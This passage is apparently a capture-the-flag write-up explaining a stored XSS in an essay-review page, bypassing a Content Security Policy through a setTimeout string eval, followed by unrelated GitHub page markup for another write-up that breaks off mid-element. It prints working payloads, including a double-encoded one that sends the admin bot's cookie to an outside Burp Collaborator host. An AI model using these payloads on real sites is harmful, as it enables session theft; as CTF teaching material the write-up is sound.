user-controlled parameters are handled. The `/review/essay` will get its contents by populating `essay_checker.html` and in this template file we notice the expression `{{essay.essay|safe}}`. This means that this parameter will not be escaped and is assumed to be already safe. So, the `essay` variable allows us for an XSS attack: ```POST /register email=asd%40foo.com&essay=<script>alert(1)</script>``` Results in the `GET review/[email protected]&essay=<script>alert(1)</script>` by the admin bot. However, the bot will not get XSSed, because of CSP. Instead, the following message will be displayed in console: `Content Security Policy: The page’s settings blocked the loading of a resource at inline (“script-src”)`. So we have to somehow circumvent CSP. Looking at the source code, we notice this bizarre javascript ```javascriptvar iloveumass = document.getElementById("debug").getAttribute("data-iloveumass");function say_something(words) { setTimeout(`console.log('${words}')`,500)}document.addEventListener("DOMContentLoaded", function() { say_something(iloveumass)});``` So, when the document has been loaded and parsed, ``setTimeout(`console.log('${words}')`,500)`` is invoked, where the `words=document.getElementById("debug").getAttribute("data-iloveumass");`. What is *evil* here, is the [setTimeout function](https://developer.mozilla.org/en-US/docs/web/api/settimeout#passing_string_literals) with a string parameter. As the documentation states: > Passing a string instead of a function to setTimeout() has the same problems as using eval(). And here we are passing a string. Also notice that `eval()` is allowed by the current CSP policy. So, we just have to inject the thing.js script and an HTML element with id `debug` and attribute `data-iloveumass` which will hold our XSS payload. The following `essay` value will trigger an `alert(1)` on the bot: ` <script src=/static/js/thing.js></script>` So the request is: ```POST /register email=asd%40foo.com&essay=<p+id%3d"debug"++data-iloveumass%3d"')%3b+alert(1)%3b+//">+<script+src%3d/static/js/thing.js></script>``` We modify the above payload to instead leak the admin's cookie: ` <script src=/static/js/thing.js></script>` We use `window.location` here as because of the CSP, the bot is not allowed to make requests to other origins. So, for example `` is not allowed. Also inline scripts, like `<script>xss</script>` are not allowed. So, the final request is: ```POST /register email=asd%40foo.com&essay=<p%2bid%253d"debug"%2b%2bdata-iloveumass%253d"')%253b%2bwindow.location%2b%253d%2b'http%253a//nb20aa7dkwzrirpv5qa71lnleck28r.burpcollaborator.net/cookie%253d'%252bencodeURIComponent(btoa(document.cookie))%253b%2b//">%2b<script%2bsrc%253d/static/js/thing.js></script>``` Notice the double encoding of all the characters. The first encoding is for the current request that we are making. Then, when the bot will make the request, it will decode the characters once more. So, after the first decoding, the bot will do the following request: ```GET /review/[email protected]&essay=<p+id%3d"debug"++data-iloveumass%3d"')%3b+window.location+%3d+'http%3a//nb20aa7dkwzrirpv5qa71lnleck28r.burpcollaborator.net/cookie%3d'%2bencodeURIComponent(btoa(document.cookie))%3b+//">+<script+src%3d/static/js/thing.js></script>``` So, the double encoding ensures that our payload is correctly formatted when the bot makes the `GET` request. If we had only encoded our payload once, then the `+` in the string concatenation would have been interpreted as a space character when the bot would make the request. Now, checking back to our callback URL, we see the request `GET /cookie=YXV0aD1WRWd4VXpGVFJEUlRWVkF6VWxNelExSXpWRFJFVFRGT1F6QXdTMGt6VERCTUlR`. The decoded value is `auth=VEgxUzFTRDRTVVAzUlMzQ1IzVDRETTFOQzAwS0kzTDBMIQ`. So, we set the cookie in our browser and visit `/join`. Then, we are presented with the flag: `UMASS{NUMB3R_0N3_1N_$TUD3NT_D1N1NG_XD86543267!}`
<html lang="en" data-color-mode="auto" data-light-theme="light" data-dark-theme="dark" data-a11y-animated-images="system"> <head> <meta charset="utf-8"> <link rel="dns-prefetch" href="https://github.githubassets.com"> <link rel="dns-prefetch" href="https://avatars.githubusercontent.com"> <link rel="dns-prefetch" href="https://github-cloud.s3.amazonaws.com"> <link rel="dns-prefetch" href="https://user-images.githubusercontent.com/"> <link rel="preconnect" href="https://github.githubassets.com" crossorigin> <link rel="preconnect" href="https://avatars.githubusercontent.com"> <link crossorigin="anonymous" media="all" rel="stylesheet" href="https://github.githubassets.com/assets/light-fe3f886b577a.css" /><link crossorigin="anonymous" media="all" rel="stylesheet" href="https://github.githubassets.com/assets/dark-a1dbeda2886c.css" /><link data-color-theme="dark_dimmed" crossorigin="anonymous" media="all" rel="stylesheet" data-href="https://github.githubassets.com/assets/dark_dimmed-1ad5cf51dfeb.css" /><link data-color-theme="dark_high_contrast" crossorigin="anonymous" media="all" rel="stylesheet" data-href="https://github.githubassets.com/assets/dark_high_contrast-11d3505dc06a.css" /><link data-color-theme="dark_colorblind" crossorigin="anonymous" media="all" rel="stylesheet" data-href="https://github.githubassets.com/assets/dark_colorblind-8b800495504f.css" /><link data-color-theme="light_colorblind" crossorigin="anonymous" media="all" rel="stylesheet" data-href="https://github.githubassets.com/assets/light_colorblind-daa38c88b795.css" /><link data-color-theme="light_high_contrast" crossorigin="anonymous" media="all" rel="stylesheet" data-href="https://github.githubassets.com/assets/light_high_contrast-1b9ea565820a.css" /><link data-color-theme="light_tritanopia" crossorigin="anonymous" media="all" rel="stylesheet" data-href="https://github.githubassets.com/assets/light_tritanopia-e4be9332dd6c.css" /><link data-color-theme="dark_tritanopia" crossorigin="anonymous" media="all" rel="stylesheet" data-href="https://github.githubassets.com/assets/dark_tritanopia-0dcf95848dd5.css" /> <link crossorigin="anonymous" media="all" rel="stylesheet" href="https://github.githubassets.com/assets/primer-c581c4e461bb.css" /> <link crossorigin="anonymous" media="all" rel="stylesheet" href="https://github.githubassets.com/assets/global-0e278d45156f.css" /> <link crossorigin="anonymous" media="all" rel="stylesheet" href="https://github.githubassets.com/assets/github-dcaf0f44dbb1.css" /> <link crossorigin="anonymous" media="all" rel="stylesheet" href="https://github.githubassets.com/assets/wiki-b72b6de22521.css" /> <script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/wp-runtime-774bfe5ae983.js"></script><script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/vendors-node_modules_stacktrace-parser_dist_stack-trace-parser_esm_js-node_modules_github_bro-327bbf-0aaeb22dd2a5.js"></script><script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/ui_packages_soft-nav_soft-nav_ts-21fc7a4a0e8f.js"></script><script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/environment-e059fd03252f.js"></script><script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/vendors-node_modules_github_selector-observer_dist_index_esm_js-2646a2c533e3.js"></script><script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/vendors-node_modules_delegated-events_dist_index_js-node_modules_github_details-dialog-elemen-63debe-c04540d458d4.js"></script><script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/vendors-node_modules_github_relative-time-element_dist_index_js-b9368a9cb79e.js"></script><script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/vendors-node_modules_fzy_js_index_js-node_modules_github_markdown-toolbar-element_dist_index_js-e3de700a4c9d.js"></script><script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/vendors-node_modules_github_auto-complete-element_dist_index_js-node_modules_github_catalyst_-6afc16-e779583c369f.js"></script><script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/vendors-node_modules_github_file-attachment-element_dist_index_js-node_modules_github_text-ex-3415a8-7ecc10fb88d0.js"></script><script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/vendors-node_modules_github_filter-input-element_dist_index_js-node_modules_github_remote-inp-79182d-befd2b2f5880.js"></script><script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/vendors-node_modules_primer_view-components_app_components_primer_primer_js-node_modules_gith-6a1af4-df3bc95b06d3.js"></script><script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/github-elements-fc0e0b89822a.js"></script><script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/element-registry-1641411db24a.js"></script><script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/vendors-node_modules_lit-html_lit-html_js-9d9fe1859ce5.js"></script><script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/vendors-node_modules_manuelpuyol_turbo_dist_turbo_es2017-esm_js-4140d67f0cc2.js"></script><script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/vendors-node_modules_github_mini-throttle_dist_index_js-node_modules_github_alive-client_dist-bf5aa2-424aa982deef.js"></script><script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/vendors-node_modules_primer_behaviors_dist_esm_dimensions_js-node_modules_github_hotkey_dist_-9fc4f4-d434ddaf3207.js"></script><script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/vendors-node_modules_color-convert_index_js-35b3ae68c408.js"></script><script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/vendors-node_modules_github_remote-form_dist_index_js-node_modules_github_session-resume_dist-def857-2a32d97c93c5.js"></script><script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/vendors-node_modules_github_paste-markdown_dist_index_esm_js-node_modules_github_quote-select-15ddcc-1512e06cfee0.js"></script><script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/app_assets_modules_github_updatable-content_ts-430cacb5f7df.js"></script><script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/app_assets_modules_github_behaviors_keyboard-shortcuts-helper_ts-app_assets_modules_github_be-f5afdb-8dd5f026c5b9.js"></script><script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/app_assets_modules_github_sticky-scroll-into-view_ts-0af96d15a250.js"></script><script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/app_assets_modules_github_behaviors_include-fragment_ts-app_assets_modules_github_behaviors_r-4077b4-75370d1c1705.js"></script><script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/app_assets_modules_github_behaviors_commenting_edit_ts-app_assets_modules_github_behaviors_ht-83c235-7883159efa9e.js"></script><script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/behaviors-742151da9690.js"></script><script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/vendors-node_modules_delegated-events_dist_index_js-node_modules_github_catalyst_lib_index_js-06ff531-32d7d1e94817.js"></script><script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/notifications-global-f5b58d24780b.js"></script><script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/vendors-node_modules_morphdom_dist_morphdom-esm_js-node_modules_github_template-parts_lib_index_js-58417dae193c.js"></script><script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/vendors-node_modules_virtualized-list_es_index_js-node_modules_github_memoize_dist_esm_index_js-8496b7c4b809.js"></script><script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/vendors-node_modules_github_clipboard-copy-element_dist_index_esm_js-node_modules_github_remo-8e6bec-232430bfe6da.js"></script><script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/vendors-node_modules_github_mini-throttle_dist_decorators_js-node_modules_scroll-anchoring_di-e71893-cc1b30c51a28.js"></script><script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/app_assets_modules_github_ref-selector_ts-7bdefeb88a1a.js"></script><script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/app_assets_modules_github_diffs_blob-lines_ts-app_assets_modules_github_diffs_linkable-line-n-f96c66-97aade341120.js"></script><script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/diffs-3a64c1f69a81.js"></script> <script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/wiki-1423a5c9ebf5.js"></script> <title>PicoCTF : Eavesdrop · not1cyyy/CTF-Writeups Wiki · GitHub</title> <meta name="route-pattern" content="/:user_id/:repository/wiki/:id(.:format)"> <meta name="current-catalog-service-hash" content="27690012a2eb28b75d0bacab0f2c11870266e8db9e019fa71fea812b82397bd6"> <meta name="request-id" content="8174:A589:7E9D15A:81DB0FF:64121B95" data-pjax-transient="true"/><meta name="html-safe-nonce" content="31d33027175f15b6aedfa2a00dbbb09e5797fc1f3cfd9f8aa88b29187599df49" data-pjax-transient="true"/><meta name="visitor-payload" content="eyJyZWZlcnJlciI6IiIsInJlcXVlc3RfaWQiOiI4MTc0OkE1ODk6N0U5RDE1QTo4MURCMEZGOjY0MTIxQjk1IiwidmlzaXRvcl9pZCI6IjM5NjM3MDc1NzY5MjM4NTU3NjUiLCJyZWdpb25fZWRnZSI6ImZyYSIsInJlZ2lvbl9yZW5kZXIiOiJmcmEifQ==" data-pjax-transient="true"/><meta name="visitor-hmac" content="a3f39a02ced36c67eaa683c0cb3133d2a7ee19cec3119c715c79905a516ab822" data-pjax-transient="true"/> <meta name="hovercard-subject-tag" content="repository:481769760" data-turbo-transient> <meta name="github-keyboard-shortcuts" content="repository" data-turbo-transient="true" /> <meta name="selected-link" value="repo_wiki" data-turbo-transient> <meta name="google-site-verification" content="c1kuD-K2HIVF635lypcsWPoD4kilo5-jA_wBFyT4uMY"> <meta name="google-site-verification" content="KT5gs8h0wvaagLKAVWq8bbeNwnZZK1r1XQysX3xurLU"> <meta name="google-site-verification" content="ZzhVyEFwb7w3e0-uOTltm8Jsck2F5StVihD0exw2fsA"> <meta name="google-site-verification" content="GXs5KoUUkNCoaAZn7wPN-t01Pywp9M3sEjnt_3_ZWPc"> <meta name="google-site-verification" content="Apib7-x98H0j5cPqHWwSMm6dNU4GmODRoqxLiDzdx9I"> <meta name="octolytics-url" content="https://collector.github.com/github/collect" /> <meta name="analytics-location" content="/<user-name>/<repo-name>/wiki/show" data-turbo-transient="true" /> <meta name="user-login" content=""> <meta name="viewport" content="width=device-width"> <meta name="description" content="This is my writeups repository ! . Contribute to not1cyyy/CTF-Writeups development by creating an account on GitHub."> <link rel="search" type="application/opensearchdescription+xml" href="/opensearch.xml" title="GitHub"> <link rel="fluid-icon" href="https://github.com/fluidicon.png" title="GitHub"> <meta property="fb:app_id" content="1401488693436528"> <meta name="apple-itunes-app" content="app-id=1477376905" /> <meta name="twitter:image:src" content="https://opengraph.githubassets.com/e171482900f0c3d46b31f49340e572ecc31e0ee3e562f7133c521eed126b0881/not1cyyy/CTF-Writeups" /><meta name="twitter:site" content="@github" /><meta name="twitter:card" content="summary_large_image" /><meta name="twitter:title" content="PicoCTF : Eavesdrop" /><meta name="twitter:description" content="This is my writeups repository ! . Contribute to not1cyyy/CTF-Writeups development by creating an account on GitHub." /> <meta property="og:image" content="https://opengraph.githubassets.com/e171482900f0c3d46b31f49340e572ecc31e0ee3e562f7133c521eed126b0881/not1cyyy/CTF-Writeups" /><meta property="og:image:alt" content="This is my writeups repository ! . Contribute to not1cyyy/CTF-Writeups development by creating an account on GitHub." /><meta property="og:image:width" content="1200" /><meta property="og:image:height" content="600" /><meta property="og:site_name" content="GitHub" /><meta property="og:type" content="object" /><meta property="og:title" content="PicoCTF : Eavesdrop" /><meta property="og:url" content="https://github.com/not1cyyy/CTF-Writeups/wiki/PicoCTF-:-Eavesdrop" /><meta property="og:description" content="This is my writeups repository ! . Contribute to not1cyyy/CTF-Writeups development by creating an account on GitHub." /> <link rel="assets" href="https://github.githubassets.com/"> <meta name="hostname" content="github.com"> <meta name="expected-hostname" content="github.com"> <meta name="enabled-features" content="TURBO_EXPERIMENT_RISKY,IMAGE_METRIC_TRACKING,GEOJSON_AZURE_MAPS"> <meta http-equiv="x-pjax-version" content="ef97471de14f8d2285f0269e8f0f7dc70845f693d3f6ccd2dd2daae5cd1bbebe" data-turbo-track="reload"> <meta http-equiv="x-pjax-csp-version" content="2a84822a832da97f1ea76cf989a357ec70c85713a2fd8f14c8421b76bbffe38c" data-turbo-track="reload"> <meta http-equiv="x-pjax-css-version" content="adfc12179419e463f9f320d07920b1684c9b7e060d4d9cd3a6cd5d0de37ce710" data-turbo-track="reload"> <meta http-equiv="x-pjax-js-version" content="711646ae23abb27cf728346f30f81c042d4428233a0795acf0e21ed664fe9d94" data-turbo-track="reload"> <meta name="turbo-cache-control" content="no-preview" data-turbo-transient=""> <meta name="go-import" content="github.com/not1cyyy/CTF-Writeups git https://github.com/not1cyyy/CTF-Writeups.git"> <meta name="octolytics-dimension-user_id" content="101048320" /><meta name="octolytics-dimension-user_login" content="not1cyyy" /><meta name="octolytics-dimension-repository_id" content="481769760" /><meta name="octolytics-dimension-repository_nwo" content="not1cyyy/CTF-Writeups" /><meta name="octolytics-dimension-repository_public" content="true" /><meta name="octolytics-dimension-repository_is_fork" content="false" /><meta name="octolytics-dimension-repository_network_root_id" content="481769760" /><meta name="octolytics-dimension-repository_network_root_nwo" content="not1cyyy/CTF-Writeups" /> <meta name="turbo-body-classes" content="logged-out env-production page-responsive"> <meta name="browser-stats-url" content="https://api.github.com/_private/browser/stats"> <meta name="browser-errors-url" content="https://api.github.com/_private/browser/errors"> <meta name="browser-optimizely-client-errors-url" content="https://api.github.com/_private/browser/optimizely_client/errors"> <link rel="mask-icon" href="https://github.githubassets.com/pinned-octocat.svg" color="#000000"> <link rel="alternate icon" class="js-site-favicon" type="image/png" href="https://github.githubassets.com/favicons/favicon.png"> <link rel="icon" class="js-site-favicon" type="image/svg+xml" href="https://github.githubassets.com/favicons/favicon.svg"> <meta name="theme-color" content="#1e2327"><meta name="color-scheme" content="light dark" /> <link rel="manifest" href="/manifest.json" crossOrigin="use-credentials"> </head> <body class="logged-out env-production page-responsive" style="word-wrap: break-word;"> <div data-turbo-body class="logged-out env-production page-responsive" style="word-wrap: break-word;"> <div class="position-relative js-header-wrapper "> Skip to content <span> <span></span></span> <script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/vendors-node_modules_github_remote-form_dist_index_js-node_modules_delegated-events_dist_inde-94fd67-04fa93bb158a.js"></script><script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/sessions-9920eaa99f50.js"></script><header class="Header-old header-logged-out js-details-container Details position-relative f4 py-3" role="banner"> <button type="button" class="Header-backdrop d-lg-none border-0 position-fixed top-0 left-0 width-full height-full js-details-target" aria-label="Toggle navigation"> <span>Toggle navigation</span> </button> <div class="container-xl d-flex flex-column flex-lg-row flex-items-center p-responsive height-full position-relative z-1"> <div class="d-flex flex-justify-between flex-items-center width-full width-lg-auto"> <svg height="32" aria-hidden="true" viewBox="0 0 16 16" version="1.1" width="32" data-view-component="true" class="octicon octicon-mark-github"> <path d="M8 0c4.42 0 8 3.58 8 8a8.013 8.013 0 0 1-5.45 7.59c-.4.08-.55-.17-.55-.38 0-.27.01-1.13.01-2.2 0-.75-.25-1.23-.54-1.48 1.78-.2 3.65-.88 3.65-3.95 0-.88-.31-1.59-.82-2.15.08-.2.36-1.02-.08-2.12 0 0-.67-.22-2.2.82-.64-.18-1.32-.27-2-.27-.68 0-1.36.09-2 .27-1.53-1.03-2.2-.82-2.2-.82-.44 1.1-.16 1.92-.08 2.12-.51.56-.82 1.28-.82 2.15 0 3.06 1.86 3.75 3.64 3.95-.23.2-.44.55-.51 1.07-.46.21-1.61.55-2.33-.66-.15-.24-.6-.83-1.23-.82-.67.01-.27.38.01.53.34.19.73.9.82 1.13.16.45.68 1.31 2.69.94 0 .67.01 1.3.01 1.49 0 .21-.15.45-.55.38A7.995 7.995 0 0 1 0 8c0-4.42 3.58-8 8-8Z"></path></svg> <div class="flex-1"> Sign up </div> <div class="flex-1 flex-order-2 text-right"> <button aria-label="Toggle navigation" aria-expanded="false" type="button" data-view-component="true" class="js-details-target Button--link Button--medium Button d-lg-none color-fg-inherit p-1"> <span> <span><div class="HeaderMenu-toggle-bar rounded my-1"></div> <div class="HeaderMenu-toggle-bar rounded my-1"></div> <div class="HeaderMenu-toggle-bar rounded my-1"></div></span> </span></button> </div> </div> <div class="HeaderMenu--logged-out p-responsive height-fit position-lg-relative d-lg-flex flex-column flex-auto pt-7 pb-4 top-0"> <div class="header-menu-wrapper d-flex flex-column flex-self-end flex-lg-row flex-justify-between flex-auto p-3 p-lg-0 rounded rounded-lg-0 mt-3 mt-lg-0"> <nav class="mt-0 px-3 px-lg-0 mb-3 mb-lg-0" aria-label="Global"> <button type="button" class="HeaderMenu-link border-0 width-full width-lg-auto px-0 px-lg-2 py-3 py-lg-2 no-wrap d-flex flex-items-center flex-justify-between js-details-target" aria-expanded="false"> Product <svg opacity="0.5" aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-chevron-down HeaderMenu-icon ml-1"> <path d="M12.78 5.22a.749.749 0 0 1 0 1.06l-4.25 4.25a.749.749 0 0 1-1.06 0L3.22 6.28a.749.749 0 1 1 1.06-1.06L8 8.939l3.72-3.719a.749.749 0 0 1 1.06 0Z"></path></svg> </button> <div class="HeaderMenu-dropdown dropdown-menu rounded m-0 p-0 py-2 py-lg-4 position-relative position-lg-absolute left-0 left-lg-n3 d-lg-flex dropdown-menu-wide"> <svg aria-hidden="true" height="24" viewBox="0 0 24 24" version="1.1" width="24" data-view-component="true" class="octicon octicon-workflow color-fg-subtle mr-3"> <path d="M1 3a2 2 0 0 1 2-2h6.5a2 2 0 0 1 2 2v6.5a2 2 0 0 1-2 2H7v4.063C7 16.355 7.644 17 8.438 17H12.5v-2.5a2 2 0 0 1 2-2H21a2 2 0 0 1 2 2V21a2 2 0 0 1-2 2h-6.5a2 2 0 0 1-2-2v-2.5H8.437A2.939 2.939 0 0 1 5.5 15.562V11.5H3a2 2 0 0 1-2-2Zm2-.5a.5.5 0 0 0-.5.5v6.5a.5.5 0 0 0 .5.5h6.5a.5.5 0 0 0 .5-.5V3a.5.5 0 0 0-.5-.5ZM14.5 14a.5.5 0 0 0-.5.5V21a.5.5 0 0 0 .5.5H21a.5.5 0 0 0 .5-.5v-6.5a.5.5 0 0 0-.5-.5Z"></path></svg> <div> <div class="color-fg-default h4">Actions</div> Automate any workflow </div> <svg aria-hidden="true" height="24" viewBox="0 0 24 24" version="1.1" width="24" data-view-component="true" class="octicon octicon-package color-fg-subtle mr-3"> <path d="M12.876.64V.639l8.25 4.763c.541.313.875.89.875 1.515v9.525a1.75 1.75 0 0 1-.875 1.516l-8.25 4.762a1.748 1.748 0 0 1-1.75 0l-8.25-4.763a1.75 1.75 0 0 1-.875-1.515V6.917c0-.625.334-1.202.875-1.515L11.126.64a1.748 1.748 0 0 1 1.75 0Zm-1 1.298L4.251 6.34l7.75 4.474 7.75-4.474-7.625-4.402a.248.248 0 0 0-.25 0Zm.875 19.123 7.625-4.402a.25.25 0 0 0 .125-.216V7.639l-7.75 4.474ZM3.501 7.64v8.803c0 .09.048.172.125.216l7.625 4.402v-8.947Z"></path></svg> <div> <div class="color-fg-default h4">Packages</div> Host and manage packages </div> <svg aria-hidden="true" height="24" viewBox="0 0 24 24" version="1.1" width="24" data-view-component="true" class="octicon octicon-shield-check color-fg-subtle mr-3"> <path d="M16.53 9.78a.75.75 0 0 0-1.06-1.06L11 13.19l-1.97-1.97a.75.75 0 0 0-1.06 1.06l2.5 2.5a.75.75 0 0 0 1.06 0l5-5Z"></path><path d="m12.54.637 8.25 2.675A1.75 1.75 0 0 1 22 4.976V10c0 6.19-3.771 10.704-9.401 12.83a1.704 1.704 0 0 1-1.198 0C5.77 20.705 2 16.19 2 10V4.976c0-.758.489-1.43 1.21-1.664L11.46.637a1.748 1.748 0 0 1 1.08 0Zm-.617 1.426-8.25 2.676a.249.249 0 0 0-.173.237V10c0 5.46 3.28 9.483 8.43 11.426a.199.199 0 0 0 .14 0C17.22 19.483 20.5 15.461 20.5 10V4.976a.25.25 0 0 0-.173-.237l-8.25-2.676a.253.253 0 0 0-.154 0Z"></path></svg> <div> <div class="color-fg-default h4">Security</div> Find and fix vulnerabilities </div> <svg aria-hidden="true" height="24" viewBox="0 0 24 24" version="1.1" width="24" data-view-component="true" class="octicon octicon-codespaces color-fg-subtle mr-3"> <path d="M3.5 3.75C3.5 2.784 4.284 2 5.25 2h13.5c.966 0 1.75.784 1.75 1.75v7.5A1.75 1.75 0 0 1 18.75 13H5.25a1.75 1.75 0 0 1-1.75-1.75Zm-2 12c0-.966.784-1.75 1.75-1.75h17.5c.966 0 1.75.784 1.75 1.75v4a1.75 1.75 0 0 1-1.75 1.75H3.25a1.75 1.75 0 0 1-1.75-1.75ZM5.25 3.5a.25.25 0 0 0-.25.25v7.5c0 .138.112.25.25.25h13.5a.25.25 0 0 0 .25-.25v-7.5a.25.25 0 0 0-.25-.25Zm-2 12a.25.25 0 0 0-.25.25v4c0 .138.112.25.25.25h17.5a.25.25 0 0 0 .25-.25v-4a.25.25 0 0 0-.25-.25Z"></path><path d="M10 17.75a.75.75 0 0 1 .75-.75h6.5a.75.75 0 0 1 0 1.5h-6.5a.75.75 0 0 1-.75-.75Zm-4 0a.75.75 0 0 1 .75-.75h.5a.75.75 0 0 1 0 1.5h-.5a.75.75 0 0 1-.75-.75Z"></path></svg> <div> <div class="color-fg-default h4">Codespaces</div> Instant dev environments </div> <svg aria-hidden="true" height="24" viewBox="0 0 24 24" version="1.1" width="24" data-view-component="true" class="octicon octicon-copilot color-fg-subtle mr-3"> <path d="M9.75 14a.75.75 0 0 1 .75.75v2.5a.75.75 0 0 1-1.5 0v-2.5a.75.75 0 0 1 .75-.75Zm4.5 0a.75.75 0 0 1 .75.75v2.5a.75.75 0 0 1-1.5 0v-2.5a.75.75 0 0 1 .75-.75Z"></path><path d="M12 2c2.214 0 4.248.657 5.747 1.756.136.099.268.204.397.312.584.235 1.077.546 1.474.952.85.869 1.132 2.037 1.132 3.368 0 .368-.014.733-.052 1.086l.633 1.478.043.022A4.75 4.75 0 0 1 24 15.222v1.028c0 .529-.309.987-.565 1.293-.28.336-.636.653-.966.918a13.84 13.84 0 0 1-1.299.911l-.024.015-.006.004-.039.025c-.223.135-.45.264-.68.386-.46.245-1.122.571-1.941.895C16.845 21.344 14.561 22 12 22c-2.561 0-4.845-.656-6.479-1.303a19.046 19.046 0 0 1-1.942-.894 14.081 14.081 0 0 1-.535-.3l-.144-.087-.04-.025-.006-.004-.024-.015a13.16 13.16 0 0 1-1.299-.911 6.913 6.913 0 0 1-.967-.918C.31 17.237 0 16.779 0 16.25v-1.028a4.75 4.75 0 0 1 2.626-4.248l.043-.022.633-1.478a10.195 10.195 0 0 1-.052-1.086c0-1.331.282-2.498 1.132-3.368.397-.406.89-.717 1.474-.952.129-.108.261-.213.397-.312C7.752 2.657 9.786 2 12 2Zm-8 9.654v6.669a17.59 17.59 0 0 0 2.073.98C7.595 19.906 9.686 20.5 12 20.5c2.314 0 4.405-.594 5.927-1.197a17.59 17.59 0 0 0 2.073-.98v-6.669l-.038-.09c-.046.061-.095.12-.145.177-.793.9-2.057 1.259-3.782 1.259-1.59 0-2.738-.544-3.508-1.492a4.323 4.323 0 0 1-.355-.508h-.344a4.323 4.323 0 0 1-.355.508C10.704 12.456 9.555 13 7.965 13c-1.725 0-2.989-.359-3.782-1.259a3.026 3.026 0 0 1-.145-.177Zm6.309-1.092c.445-.547.708-1.334.851-2.301.057-.357.087-.718.09-1.079v-.031c-.001-.762-.166-1.26-.43-1.568l-.008-.01c-.341-.391-1.046-.689-2.533-.529-1.505.163-2.347.537-2.824 1.024-.462.473-.705 1.18-.705 2.32 0 .605.044 1.087.135 1.472.092.384.231.672.423.89.365.413 1.084.75 2.657.75.91 0 1.527-.223 1.964-.564.14-.11.268-.235.38-.374Zm2.504-2.497c.136 1.057.403 1.913.878 2.497.442.545 1.134.938 2.344.938 1.573 0 2.292-.337 2.657-.751.384-.435.558-1.151.558-2.361 0-1.14-.243-1.847-.705-2.319-.477-.488-1.318-.862-2.824-1.025-1.487-.161-2.192.139-2.533.529-.268.308-.437.808-.438 1.578v.02c.002.299.023.598.063.894Z"></path></svg> <div> <div class="color-fg-default h4">Copilot</div> Write better code with AI </div> <svg aria-hidden="true" height="24" viewBox="0 0 24 24" version="1.1" width="24" data-view-component="true" class="octicon octicon-code-review color-fg-subtle mr-3"> <path d="M10.3 6.74a.75.75 0 0 1-.04 1.06l-2.908 2.7 2.908 2.7a.75.75 0 1 1-1.02 1.1l-3.5-3.25a.75.75 0 0 1 0-1.1l3.5-3.25a.75.75 0 0 1 1.06.04Zm3.44 1.06a.75.75 0 1 1 1.02-1.1l3.5 3.25a.75.75 0 0 1 0 1.1l-3.5 3.25a.75.75 0 1 1-1.02-1.1l2.908-2.7-2.908-2.7Z"></path><path d="M1.5 4.25c0-.966.784-1.75 1.75-1.75h17.5c.966 0 1.75.784 1.75 1.75v12.5a1.75 1.75 0 0 1-1.75 1.75h-9.69l-3.573 3.573A1.458 1.458 0 0 1 5 21.043V18.5H3.25a1.75 1.75 0 0 1-1.75-1.75ZM3.25 4a.25.25 0 0 0-.25.25v12.5c0 .138.112.25.25.25h2.5a.75.75 0 0 1 .75.75v3.19l3.72-3.72a.749.749 0 0 1 .53-.22h10a.25.25 0 0 0 .25-.25V4.25a.25.25 0 0 0-.25-.25Z"></path></svg> <div> <div class="color-fg-default h4">Code review</div> Manage code changes </div> <svg aria-hidden="true" height="24" viewBox="0 0 24 24" version="1.1" width="24" data-view-component="true" class="octicon octicon-issue-opened color-fg-subtle mr-3"> <path d="M12 1c6.075 0 11 4.925 11 11s-4.925 11-11 11S1 18.075 1 12 5.925 1 12 1ZM2.5 12a9.5 9.5 0 0 0 9.5 9.5 9.5 9.5 0 0 0 9.5-9.5A9.5 9.5 0 0 0 12 2.5 9.5 9.5 0 0 0 2.5 12Zm9.5 2a2 2 0 1 1-.001-3.999A2 2 0 